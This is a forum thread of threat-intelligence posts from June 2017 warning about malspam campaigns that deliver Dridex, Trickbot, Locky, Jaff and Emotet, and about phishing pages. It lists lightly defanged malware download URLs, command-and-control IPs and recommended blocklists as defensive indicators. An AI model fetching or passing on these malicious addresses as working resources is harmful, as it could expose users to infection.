> https://www.virustot...b047e/analysis/
valdigresta .com: 64.202.169.211: https://www.virustot...11/information/
> https://www.virustot...1b8b0/analysis/
leadsfunnel360 .com: 50.63.124.1: https://www.virustot....1/information/
> https://www.virustot...cfb18/analysis/
 

:ninja: :ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 01 June 2017 - 09:29 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1939 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 02 June 2017 - 06:47 AM

FYI...

Fake 'Invoice' SPAM - delivers Dridex
- https://myonlinesecu...banking-trojan/
2 Jun 2017 - "... emails with -pdf- attachments that drops a malicious macro enabled word doc is an email with the subject of 'Invoice INV-0790' (random numbers) pretending to come from random names and email address that delivers Dridex banking Trojan...

Screenshot: https://myonlinesecu...ce-inv-0790.png

Invoice INV-0790.pdf - Current Virus total detections 12/56*. Payload Security** drops 231GEOHJWMQN935.docm
(VirusTotal 10/59[3]) (Payload Security[4]) downloads an encrypted txt file from
 http ://lanphuong .vn\hH60bd which is converted by the script to miniramon8.exe
(VirusTotal 8/62[5]) (Payload Security[6]).
There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)
lanphuong .vn\hH60bd
newserniggrofg .net\af\hH60bd
resevesssetornument .com\af\hH60bd
mountmary .ca\hH60bd
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496395482/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
112.213.85.78
185.141.25.23
147.32.5.111
192.99.108.183
31.193.131.147


3] https://www.virustot...sis/1496395712/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
112.213.85.78
185.141.25.23
147.32.5.111
192.99.108.183
31.193.131.147


5] https://www.virustot...sis/1496396221/

6] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.141.25.23
147.32.5.111
192.99.108.183
31.193.131.147


lanphuong .vn: 112.213.85.78: https://www.virustot...78/information/
> https://www.virustot...0a0ad/analysis/
___

Fake 'Message' SPAM - delivers Dridex
- https://myonlinesecu...-email-address/
2 Jun 2017 - "... emails with -pdf- attachments that drops a malicious macro enabled word doc is a blank/empty email with the subject of 'Message from KM_C224e' pretending to come from a -copier- at your email address that delivers Dridex banking Trojan...

Screenshot: https://myonlinesecu...om-KM_C224e.png

The payload & websites are exactly the -same- as described in today’s earlier Dridex malspam run using fake invoices*..."
* https://myonlinesecu...banking-trojan/
2 Jun 2017
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 02 June 2017 - 08:16 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1940 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 05 June 2017 - 07:14 AM

FYI...

Fake 'Invoice' SPAM - delivers Dridex
- https://myonlinesecu...banking-trojan/
5 Jun 2017 - "... emails with random numbered -pdf- attachments that drops a malicious macro enabled word doc is an email with the subject of 'Invoice' pretending to come from a random first name Holmes at random email addresses but the body of the email imitates John Miller Ltd...

Screenshot: https://myonlinesecu...ler_-Holmes.png

... the PDF actually having some content that makes it almost look real:
> https://myonlinesecu..._129303_pdf.png

A4 Inv_Crd 21297.pdf - Current Virus total detections 9/56*. Payload Security**
 drops Invoice_129302.docm (VirusTotal 8/59[3]) (Payload Security[4]) downloads an encrypted txt file from
 http ://spaceonline .in\8yfh4gfff which is converted by the script to miniramon8.exe (VirusTotal 13/61[5])...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496654801/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
111.118.212.86
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177


3] https://www.virustot...sis/1496654938/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
111.118.212.86
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177


5] https://www.virustot...85e97/analysis/

spaceonline .in: 111.118.212.86: https://www.virustot...86/information/
> https://www.virustot...c915b/analysis/
___

- http://blog.dynamoo....ed-invoice.html
5 Jun 2017 - "This spam pretends to come from John Miller Ltd (but doesn't) and comes with a malicious payload. The domain mentioned in the email does -not- match the company being spoofed, and varies from message to message.

Screenshot: https://3.bp.blogspo...john-miller.png

The attachment currently has a detection rate of about 9/56*. As is common with some recent attacks, the PDF actually contains an embedded Microsoft Office document. Hybrid Analysis** shows the malicious file downloading a component from cartus-imprimanta .ro/8yfh4gfff (176.126.200.56 - HostVision SRL, Romania) although other -variants- possibly exist. A file is dropped (in the HA report called miniramon8.exe) at detection rate of 11/61***. According to the Hybrid Analysis report, that attempts tom communicate with the following IPs:
192.48.88.167 (Tocici LLC, US)
89.110.157.78 (netclusive GmbH, Germany)
85.214.126.182 (Strato AG, Germany)
46.101.154.177 (Digital Ocean, Germany)
The payload is not clear at this time, but it will be nothing good.
Recommended blocklist:
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177
"
* https://virustotal.c...sis/1496654625/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
176.126.200.56
192.48.88.167
89.110.157.78
85.214.126.182
46.101.154.177


*** https://virustotal.c...sis/1496655625/

cartus-imprimanta .ro: 176.126.200.56: https://www.virustot...56/information/
> https://www.virustot...70dc3/analysis/
___

'WakeMed' Phish
REAL 'WakeMed': http://www.wakemed.org/contact-us
Raleigh, NC 27610

FAKE/Phish: https://myonlinesecu...pt-at-phishing/
5 June 2017

Screenshot: https://myonlinesecu...ERVICE-DESK.png

"... If you follow the link you see a  very badly designed webpage, complete with spelling errors, obviously created by a non English speaker, looking like this:
(from: http ://itupdat.tripod .com/)
> https://myonlinesecu...ripod_phish.png

... the spam -email- is a -compromised- (may be spoofed) Canadian Nova Scotia Department of Education address... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

itupdat.tripod .com: 209.202.252.101: https://www.virustot...01/information/
> https://www.virustot...0ddb7/analysis/

ccrsb .ca: 142.227.247.226: https://www.virustot...26/information/
___

Police dismantle crime network - online payment SCAMS
- https://www.helpnets...-crime-network/
June 5, 2017 - "The Polish National Police, working in close cooperation with its law enforcement counterparts in Croatia, Germany, Romania and Sweden, alongside Europol’s European Cybercrime Centre (EC3), have smashed a Polish organised crime network suspected of online payment scams and money laundering... Operation MOTO on 29-31 May 2017 resulted in 9 arrests including the criminal network’s masterminds, as well as 25 house searches in Poland. The perpetrators were advertising online cars as well as construction or agricultural machinery/vehicles, but never delivered the advertised goods to interested buyers, despite having received advance fee payments..."
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 05 June 2017 - 01:46 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1941 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 07 June 2017 - 05:08 AM

FYI...

Fake 'Invoice' SPAM - pdf attachments drop malware
- https://myonlinesecu...anking-malware/
7 Jun 2017 - "...  emails with -pdf- attachments that drop a malicious macro enabled word doc... email with the subject of '32_Invoice_2220' (random numbers at start and end of invoice) pretending to come from random names and email addresses that delivers what looks like either Dridex or Emotet banking malware...

Screenshot: https://myonlinesecu...aff_invoice.png

001_8951.pdf - Current Virus total detections 12/54*: Payload Security** drops 690UICEBVOFF735.docm
... downloads an encrypted txt file from
 http ://micolon .de/7gyb3ds which is converted by the script to krivokor8.exe
(VirusTotal 8/61[3]) (Payload Security[4])...
* https://www.virustot...sis/1496825964/
001_0673.pdf

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.169.145.167
37.120.182.208
194.87.234.99
192.157.238.15
185.23.113.100
178.33.146.207


3] https://www.virustot...3d40c/analysis/
krivokor8 - Copy.exe

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.218.206.69

The -macros- in this example are very different to the ones we have previously seen. There are 3 hardcoded (slightly obfuscated) download sites in -each- macro (The first I examined had these 3):
micolon .de/7gyb3ds
essentialnulidtro .com/af/7gyb3ds
suskunst .dk/7gyb3ds
Thanks to Racco42[5], -other- download sites found include:
5] https://twitter.com/...384811301834752
http ://adproautomation .in/7gyb3ds
http ://camberwellroofing .com.au/7gyb3ds
http ://caperlea .com/7gyb3ds
http ://choralia .net/7gyb3ds
http ://chqm168 .com/7gyb3ds
http ://essentialnulidtro .com/af/7gyb3ds
http ://luxcasa .pt/7gyb3ds
http ://micolon .de/7gyb3ds
http ://musee-champollion .fr/7gyb3ds
http ://mytraveltrip .in/7gyb3ds
http ://saheser .net/7gyb3ds
http ://sanftes-reiten .de/7gyb3ds
http ://shopf3 .com/7gyb3ds
http ://shreekamothe .com/7gyb3ds
http ://spocom .de/7gyb3ds
http ://sumbermakmur .com/7gyb3ds
http ://surgideals .com/7gyb3ds
http ://suskunst .dk/7gyb3ds
http ://sutek-industry .com/7gyb3ds
http ://svagin .dk/7gyb3ds
http ://xinding .com/7gyb3ds ...
... Malware IP's: https://pastebin.com/arUi7B1H
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___

Fake blank/empty SPAM - delivers Trickbot
- https://myonlinesecu...-delivery-lure/
7 Jun 2017 - "... an email with a blank/empty subject as well as a completely empty email body pretending to come from random senders with a malicious word doc attachment delivers Trickbot... One of the email looks like:
From: random senders
Date: Wed 07/06/2017 13:15
Subject: none
Attachment: SCAN_0636.doc


Body content: Totally Blank/Empty

SCAN_0636.doc - Current Virus total detections 12/59*. Payload Security** downloads an encrypted txt file from
 http ://beursgays .com\7gyb3ds
Still delivering the same krivokor8.exe (VirusTotal 9/61[3]) (Payload Security[4]) which is Trickbot banking Trojan.
So far We have found these additional sites:
 essentialnulidtro .com\af\7gyb3ds
 martos .pt\7gyb3ds
 castvinyl .ru\7gyb3ds ...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496837651/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
178.237.37.40
50.19.227.215
185.86.150.185


3] https://www.virustot...3d40c/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.218.206.69

beursgays .com: 178.237.37.40: https://www.virustot...40/information/
> https://www.virustot...3e378/analysis/

essentialnulidtro .com: 119.28.85.128: https://www.virustot...28/information/
> https://www.virustot...21088/analysis/

martos .pt: 91.198.47.86: https://www.virustot...86/information/
> https://www.virustot...2aefd/analysis/

castvinyl .ru: 89.111.176.244: https://www.virustot...44/information/
> https://www.virustot...f690f/analysis/
___

Fake 'Message' SPAM - delivers ransomware
- https://myonlinesecu...ber-ransomware/
7 Jun 2017 - "... using 'Message from KM_C224e'... using the same subject and email template but with a zip attachment containing an .exe file... pretends to come from copier @ your-own-email-domain... Confirmed: this is JAFF ransomware...

Screenshot: https://myonlinesecu...zip-version.png

SKM_C224e03215953284.zip: Extracts to: SKM_C224e9930.exe - Current Virus total detections 12/61*
Payload Security** | MALWR***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496843658/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
52.15.162.35

*** https://malwr.com/an...GQxZTI4NzZlOTM/
Hosts
52.15.162.35: https://www.virustot...35/information/
> https://www.virustot...1b9a6/analysis/
___

Office365 - Phish
- https://myonlinesecu...uired-phishing/
7 Jun 2017 - "... pretends to be a message from Microsoft Office365 saying 'your mailbox is full'...

Screenshot: https://myonlinesecu...shing-email.png

-If- you follow the link in the email, you first get sent to:
 http ://ronaldsinkwell .com.br/js/Office365/Secure/ where you get an immediate -redirection- ... and you see a webpage looking like this:
 http ://www .ftc-network .com/js/Microsoft/Office365/ :
> https://myonlinesecu...65_phishing.png

... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

ronaldsinkwell .com.br: 192.185.214.91: https://www.virustot...91/information/
> https://www.virustot...aff52/analysis/

ftc-network .com: 103.13.240.186: https://www.virustot...86/information/
> https://www.virustot...d1b26/analysis/
 

:ninja: :ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 07 June 2017 - 12:43 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1942 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 08 June 2017 - 07:13 AM

FYI...

Fake 'eFax' SPAM - delivers smoke/sharik/dofoil and Trickbot
- https://myonlinesecu...l-and-trickbot/
7 June 2017 - "An email with the subject of 'eFax message from 0300 200 3835' – 2 pages pretending to come from efax but actually coming from a look-alike-domain eFax <message@ mail.efaxcorporate254 .top> with a malicious word doc attachment...
mail.efaxcorporate254 .top was registered on 5 June 2017 via publicdomainregistry .com using what are obviously -fake- details and hosted on a Russian server 185.186.141.227. Other -variants- of the domain are hosted on other IPs in the '109.248.200.0 – 109.248.203.255′ and ‘185.186.140.0 – 185.186.143.255’ ranges. Other -variants- of this were registered between 1st and 5th June 2017...

Screenshot: https://myonlinesecu...835-2-pages.png

FAX_20170607_1496754696_302.doc - Current Virus total detections 7/57* Payload Security** shows a download from
  http ://5.149.250.240 /jun7.exe gets -renamed- to Pvmzgo.exe and autorun (VirusTotal 35/61[3]) Payload Security[4]. The malware on http ://5.149.250.240 is being updated at frequent intervals (currently still using jun7.exe) but I have seen 2 different versions since I originally posted... VirusTotal 10/59[5] 14/61[6] Payload Security[7]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496851706/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
5.149.250.240
185.159.128.150


3] https://www.virustot...87736/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
95.101.187.176
185.159.128.150


5] https://www.virustot...sis/1496866638/
jun7_exe

6] https://www.virustot...sis/1496899315/
jun7.exe

7] https://www.hybrid-a...vironmentId=100
Contacted Hosts
212.227.91.231
193.104.215.58
185.159.128.150


> Update 8 June 2017: -another- run of same email...
fax_20170608_96784512_336.doc - Current Virus total detections 5/55[8]. Payload Security[9] shows a download from
  http ://185.81.113.94 /jun8.exe gets -renamed- to Gqkdau.exe and autorun
(VirusTotal 14/61[10]) Payload Security[11]...
8] https://www.virustot...sis/1496913428/

9] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.81.113.94
185.159.128.150
192.150.16.117


10] https://www.virustot...sis/1496924193/
jun8.exe

11] https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.81.113.94: https://www.virustot...94/information/
> https://www.virustot...b40e6/analysis/
185.81.113.94 /jun8.exe
___

More Fake 'eFax' SPAM - delivers malware via ole rtf exploit
- https://myonlinesecu...le-rtf-exploit/
8 Jun 2017 - "Another -fake- eFax email... subject of 'eFax message from 116 – 921 – 1271' – 5 pages  pretending to come from eFax Inc <noreply@ efax .com> with a zip attachment containing a malicious word doc...

Screenshot: https://myonlinesecu...271-5-pages.png

QSVN19945204621.zip extracts to pxsmnxd.doc - Current Virus total detections 11/57*. Payload Security**...
... 'found an embedded ole object in the rtf file. It will be using a recent rtf exploit... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496924661/
pxsmnxd.doc

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
5.196.42.122: https://www.virustot...22/information/
> https://www.virustot...9a263/analysis/
 

:ninja: :ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 08 June 2017 - 02:09 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1943 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 09 June 2017 - 07:08 AM

FYI...

Fake 'Credit Note' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
9 Jun 2017 - "... an email with the subject of 'Copy Credit Note' coming or pretending to come from Anna Mills anna.mills@ random email addresses with a semi-random named zip attachment which contains another zip file which delivers a wsf file eventually delivering what looks like emotet banking Trojan...

Screenshot: https://myonlinesecu.../anna_mills.png

1763904.zip extracts to AA-213-RR.zip: Extracts to: AA-213-RR.wsf - Current Virus total detections 11/55*
Payload Security** shows a download of an encrypted file from
 http ://sellitni .com/hjgf677??RqtfrQRDh=FirlRSoaCC  which is converted by the script to emsjwIjFro1.exe
(VirusTotal 22/61[3]) which suggests it might be emotet banking malware (Payload Security[4])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1496999598/
AA-213-RR.wsf

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
188.165.220.204: https://www.virustot...04/information/
> https://www.virustot...6be34/analysis/

3] https://www.virustot...f0ba0/analysis/

4] https://www.hybrid-a...vironmentId=100
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 09 June 2017 - 07:16 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1944 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 12 June 2017 - 01:39 PM

FYI...

Fake 'invoice' SPAM - delivers malware
- https://myonlinesecu...sing-wsf-files/
12 Jun 2017 - "... an email with the subject of 'Invoice PIS0120650' (random numbers) coming or pretending to come from NoReplyMailbox @ random companies, names and email addresses with a zip attachment which matches the subject that contains another zip file, containing a WSF file which eventually delivers what looks like it will turn out to be either Dridex or Trickbot banking Trojan...

Screenshot: https://myonlinesecu...-PIS0120650.png

InvoicePIS0120650.zip: extracts to  LZTFBQLX6G.zip which Extracts to: LZTFBQLX6G.wsf
Current Virus total detections 12/56*. Payload Security** shows a download of an encrypted file from
 http ://ythongye .com/8yhf2ui? which is converted by the script to wvHyIX1.exe
(VirusTotal 19/60[3]) Payload Security[4]...  found 4 -different- WSF files amongst the 150 zips received:
LZTFBQLX6G.wsf - Current Virus total detections 12/56[5]
IZ7JAG6.wsf - Current Virus total detections 11/55[6]
MVUN1W9FO1.wsf - Current Virus total detections 14/56[7]
TOTAHZEQT.wsf - Current Virus total detections 14/56[8]
Manual examination of the various WSF scripting files received shows these download Locations for the malware (obfuscated in the WSF file using base64 encoding & extra padding):
78tguyc876wwirglmltm .net/af/8yhf2ui > 119.28.85.128
e67tfgc4uybfbnfmd .org/af/8yhf2ui > 119.28.85.128
sacrecoeur.bravepages .com/8yhf2ui? > 66.219.202.10
ythongye .com/8yhf2ui? > 103.249.108.128
sheekchilly .com/8yhf2ui? > 103.21.59.174
lamartechnical .com/8yhf2ui? > 216.97.233.44
syrianchristiancentre .org/8yhf2ui? > 103.21.58.130
skveselka .wz.cz/8yhf2ui > 185.64.219.7
svadba-tamada .de/8yhf2ui > 81.169.145.148
aacom .pl/8yhf2ui? > 193.239.206.248
smartzaa .com/8yhf2ui? > 103.21.58.252
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497289622/
LZTFBQLX6G.wsf

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
103.249.108.128

3] https://www.virustot...43277/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
103.249.108.128

5] https://www.virustot...sis/1497289622/

6] https://www.virustot...sis/1497281678/

7] https://www.virustot...sis/1497294665/

8] https://www.virustot...sis/1497294745/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 12 June 2017 - 03:11 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1945 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 14 June 2017 - 05:30 AM

FYI...

Fake 'Emailing' SPAM - delivers pdf malware
- https://myonlinesecu...eliver-malware/
14 Jun 2017 - "... an email with the subject of 'Emailing: 288639672' (random numbers) pretending to come from random names and email address that delivers some sort of malware. Over the last couple of weeks these have switched between Jaff ransomware, Dridex banking Trojans and Trickbot banking Trojan...

Screenshot: https://myonlinesecu...g-288639672.png

288639672.pdf Current Virus total detections 11/56*. Payload Security** drops 000049764694.xlsm
(VirusTotal 11/56[3]) (Payload Security[4]). JoeSandbox[5]: downloads an encrypted txt file from
 http ://mailblust .com\98tf77b which is converted by the script to fungedsp8.exe (VirusTotal 8/60[6])..
There are 4 hardcoded (slightly obfuscated) download sites in the macro (there will be more in other versions)
mailblust .com\98tf77b > 162.251.85.92
78tguyc876wwirglmltm .net\af\98tf77b > 119.28.85.128
randomessstioprottoy .net\af\98tf77b > 119.28.85.128
3456group .com\98tf77b > 69.49.96.24
... Other sites found so far have been posted HERE:
- https://twitter.com/...943588412653568
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497432816/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
162.251.85.92

3] https://www.virustot...sis/1497432816/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
162.251.85.92

5] https://jbxcloud.joe...s/291764/1/html

6] https://www.virustot...sis/1497433869/
___

'Google Drive' - Phish
- https://myonlinesecu...-phishing-scam/
14 Jun 2017 - "...  phishing attempts for email credentials... pretends to be a message saying 'log in to Google Drive' to get some documents that have been sent to you...

Screenshot: https://myonlinesecu...ve-phishing.png

If you follow the link (all are identical) you see a webpage looking like this:
 https ://www.mealcare .ca/gdrive/drive/drive/auth/view/share/ - but it is HTTPS so it is “safe“. That is nothing you give to the criminal can be intercepted, so your email log in details can’t be stolen by another criminal on the way. Remember a green padlock HTTPS does NOT mean the site is safe. All it means is secure from easy interception between your computer and that site:
> https://myonlinesecu...ogle_phish1.png

After you select 'click here' on this identical copy of the Google drive page (if you are not looking at the url bar) you get:
> https://myonlinesecu...ogle_phish2.png

After you input your details you get sent to a 404 not found page on Morgan Stanley website. I can only assume the phisher tried to link originally to a genuine pdf on Morgan Stanley who quickly removed it:
> https://myonlinesecu...stanley_404.png..."

mealcare .ca: 77.104.162.117: https://www.virustot...17/information/
> https://www.virustot...c8939/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 14 June 2017 - 11:46 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1946 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 15 June 2017 - 06:21 AM

FYI...

Fake 'Moneygram' SPAM - delivers java adwind
- https://myonlinesecu...rs-java-adwind/
15 Jun 2017 - "... a slightly different subject and email content to previous ones... These have a genuine PDF attachment with a -link- in it that downloads a zip containing the malware. The link goes to
 https ://www.domingosdandreaimoveis .com.br/wp-admin/images/Moneygram.transactions.12thJune.2017.zip
which is almost certainly a compromised wordpress site...

Screenshot: https://myonlinesecu...h-June-2017.png

The pdf looks like:
> https://myonlinesecu...chedule_pdf.png

Moneygram.transactions.12thJune.2017.jar (474kb) - Current Virus total detections 21/55*. Payload Security**...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497502711/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
185.120.144.148

domingosdandreaimoveis .com.br: 187.45.187.122: https://www.virustot...10/information/
 

:ninja: :ninja:    :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1947 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 16 June 2017 - 07:28 AM

FYI...

Fake Email account notice – Phish
... 'Your Mailbox Will Be Terminated'
- https://myonlinesecu...il-credentials/
16 Jun 2017 - "We see lots of phishing attempts for email credentials. This one is slightly different...

Screenshot: https://myonlinesecu...ler.co_.uk-.png

If you follow the link you see a webpage looking like this:
 https ://deadsocial .com//media/email_updatep1/login.php?userid=ans@ thespykiller .co.uk
(you can put any email address at the end of the link & get the same page with email already filled in).
The red countdown continues to decrease in time while the page is open:
> https://myonlinesecu...mail_update.png

... After you input your email address and password, you get told 'incorrect details' and forwarded to an almost identical looking page where you can put it in again and it does that on a continual loop:
> https://myonlinesecu...ail_update2.png

... Don’t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information..."

deadsocial .com: 184.154.216.243: https://www.virustot...43/information/
> https://www.virustot...b24c7/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 17 June 2017 - 06:29 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1948 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 20 June 2017 - 04:40 AM

FYI...

Fake DHL SPAM - delivers malware
- https://myonlinesecu...livers-malware/
20 Jun 2017 - "An email with the subject of 'Commercial Invoice' pretending to come from export@ dhl-invoice .com with a malicious Excel XLS spreadsheet attachment delivers some sort of malware... I am being told that -other- subjects in this malspam run -spoofing- DHL include: 'DHL Commercial Invoice' and 'DHL poforma invoice'. There appear to be several different -spoofed- senders @dhl-invoice .com...

Screenshot: https://myonlinesecu...lspam-email.png

dhl_commercial_invoice_.xls - Current Virus total detections 5/55*. Payload Security** shows a download from
 http ://travel-taxi .net/test/edf.exe (VirusTotal 51/62[3]), (Payload Security[4]).
Other download locations -embedded- in other versions of the macro include
 http ://okinawa35 .net/m/iop.exe
The XLS file looks like:
> https://myonlinesecu...invoice_xls.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1497948303/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
202.218.50.130

3] https://www.virustot...fe217/analysis/

4] https://www.hybrid-a...vironmentId=100

travel-taxi .net: 203.183.93.149: https://www.virustot...49/information/
> https://www.virustot...fc1d5/analysis/

okinawa35 .net: 202.218.50.130: https://www.virustot...30/information/
> https://www.virustot...3fd1c/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 20 June 2017 - 04:40 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1949 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 21 June 2017 - 11:04 AM

FYI...

Fake 'Invoice' SPAM - delivers Locky
- https://myonlinesecu...invoice-emails/
21 Jun 2017 - "... an email with the subject of 'Copy of Invoice 79898702' coming or pretending to come from  noreply@ random email addresses with a semi-random named zip attachment in the format of 79898702.zip (random 8 digits). The zip matches the subject... Whether this is a permanent return to Locky or a one off, I don’t know... Locky has vanished for while before & returned. It is also very unusual for Locky to come as an executable file inside a zip...

Screenshot: https://myonlinesecu...ce-79898702.png

79898702.zip: extracts to INV-09837592.zip which in turn Extracts to: INV-09837592.exe
Current Virus total detections 10/60*. Payload Security**. None of the sandboxes are showing any encrypting activity or the usual Locky signs, so it looks like a -new- version with protections against analysis. We only know it is Locky because one of the analysts[1] extracted the Locky payload from the memory while running this file (Virustotal 39/60***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...f9cd8/analysis/
INV-09837592.exe

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...sis/1498057764/
_005C0000.mem

1] https://twitter.com/...544503720247296

- http://blog.talosint...y-campaign.html
June 21, 2017 - "... The volume of Locky spam Necurs has sent since the start of this particular campaign is notable. In the first hour of this campaign, Talos observed that Locky spam accounted for up to 7.2% of email volume on one of our systems*. While the campaign has since decreased in the number of messages being sent per minute, Necurs is still actively sending messages containing Locky... we can expect a fixed version of Locky to appear in a future round of Necurs' ransomware spam... it's always risky clicking-on-links or opening -attachments- in strange email messages..."
> https://1.bp.blogspo...1600/image3.jpg
___

Fake 'Receipt to print' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
21 Jun 2017 - "... an email with the subject of 'Receipt to print' coming or pretending to come from random companies, names and email addresses with a semi-random named zip attachment which delivers some malware... Earlier WSF files today delivered Trickbot banking Trojan...

Screenshot: https://myonlinesecu...pt-to-print.png

Receipt_6706.zip: extracts to archive0124.zip which extracts to: 0923.wsf
Current Virus total detections 11/57*. Payload Security** shows a download of an encrypted file from
 http ://tag27 .com/08345ug? which is converted by the script to IeEOifS6.exe (VirusTotal 11/57***).
Manual examination and basic decoding of the WSF file shows these download locations:
tag27 .com/08345ug? > 162.210.102.220
78tguyc876wwirglmltm .net/af/08345ug > 119.28.86.18
malamalamak9 .net/08345ug? > 74.122.121.8
randomessstioprottoy .net/af/08345ug > 119.28.86.18
shreveporttradingantiques .com/08345ug? > 74.220.215.225 ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1498051603/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
162.210.102.220
119.28.86.18
